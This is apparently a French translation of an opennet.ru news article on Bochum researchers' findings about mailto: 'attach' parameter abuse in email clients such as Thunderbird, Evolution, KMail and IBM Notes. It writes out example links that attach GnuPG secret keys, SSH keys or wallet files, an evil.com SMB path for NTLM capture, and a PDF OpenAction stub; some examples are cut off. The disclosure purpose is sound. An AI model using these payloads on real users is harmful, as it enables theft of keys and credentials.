Des chercheurs de l'Université de la Ruhr à Bochum (Allemagne) () le comportement des clients de messagerie lors du traitement des liens «mailto:» avec des paramètres étendus. Cinq des vingt clients de messagerie examinés se sont révélés vulnérables à une attaque manipulant le remplacement des ressources via le paramètre «attach». De plus, six clients de messagerie étaient exposés à des attaques basées sur le remplacement des clés PGP et S/MIME, tandis que trois clients se sont avérés vulnérables à une attaque visant à extraire le contenu des messages chiffrés.
Les liens «» sont utilisés pour automatiser l'ouverture d'un client de messagerie afin d'écrire un e-mail au destinataire spécifié dans le lien. En plus de l'adresse incluse dans le lien, il est possible d'indiquer des paramètres supplémentaires, tels que le sujet de l'e-mail et un modèle de contenu type. L'attaque proposée manipule le paramètre «attach», qui permet d'ajouter une pièce jointe au message créé.
Les clients de messagerie Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) et Pegasus Mail se sont révélés vulnérables à une attaque triviale permettant d'attacher automatiquement n'importe quel fichier local spécifié par un lien de type «mailto:?attach=chemin_vers_fichier». Le fichier est attaché sans message d'avertissement, si bien que sans une attention particulière l'utilisateur peut ne pas se rendre compte que l'e-mail sera envoyé avec une pièce jointe.
Par exemple, avec un lien de type «mailto:?to=user@example.com&subject=Titre&body=Texte&attach=~/.gnupg/secring.gpg», il est possible d'intégrer dans le message les clés privées de GnuPG. Il est également possible d'envoyer le contenu des portefeuilles cryptographiques (~/.bitcoin/wallet.dat), des clés SSH (~/.ssh/id_rsa) et n'importe quel fichier accessible à l'utilisateur. De plus, Thunderbird permet d'attacher des groupes de fichiers par masque à l'aide de constructions telles que «attach=/tmp/*.txt».
En plus des fichiers locaux, certains clients de messagerie traitent des liens vers des stockages en réseau et des chemins sur un serveur IMAP. En particulier, IBM Notes permet de transmettre un fichier depuis un répertoire réseau lors du traitement de liens de type «attach=\\evil.com\dummyfile», et peut également intercepter les paramètres d'authentification NTLM en dirigeant un lien vers un serveur SMB contrôlé par l'attaquant (la requête sera envoyée avec les paramètres d'authentification actuels de l'utilisateur).
Thunderbird gère avec succès les requêtes de type « attach=imap://fetch>UID>/INBOX>1/ », permettant d'attacher du contenu provenant de dossiers sur le serveur IMAP. Les messages extraits d'IMAP, chiffrés via OpenPGP et S/MIME, sont automatiquement déchiffrés par le client de messagerie avant l'envoi. Les développeurs de Thunderbird ont signalé un problème en février et dans la version le problème a déjà été résolu (les branches Thunderbird 52, 60 et 68 restent vulnérables).
Les anciennes versions de Thunderbird se sont également révélées vulnérables à deux autres types d'attaques sur PGP et S/MIME, proposés par des chercheurs. En particulier, l'attaque par substitution de clés s'applique à Thunderbird, ainsi qu'à OutLook, PostBox, eM Client, MailMate et R2Mail2, en raison du fait que le client de messagerie importe et installe automatiquement de nouveaux certificats transmis dans les messages S/MIME, ce qui permet à l'attaquant d'organiser la substitution des clés publiques déjà enregistrées par l'utilisateur.
La deuxième attaque, qui touche Thunderbird, PostBox et MailMate, manipule les caractéristiques du mécanisme d'enregistrement automatique des brouillons de messages et permet, via des paramètres mailto, d'initier le déchiffrement de messages chiffrés ou d'ajouter une signature numérique à des messages quelconques, avec transmission du résultat vers le serveur IMAP de l'attaquant. Le texte chiffré dans cette attaque est transmis via le paramètre « body », et une balise « meta refresh » est utilisée pour initier la requête au serveur IMAP de l'attaquant. Par exemple : ‘<meta http-equiv=
Pour un traitement automatique des liens « mailto : » sans intervention de l'utilisateur, des documents PDF spécialement formatés peuvent être utilisés — l'action OpenAction dans PDF permet de lancer automatiquement le gestionnaire mailto lors de l'ouverture du document :
%PDF-1.5
1 0 obj
<>
endobj
2 0 obj
<>
endobj
Source : opennet.ru
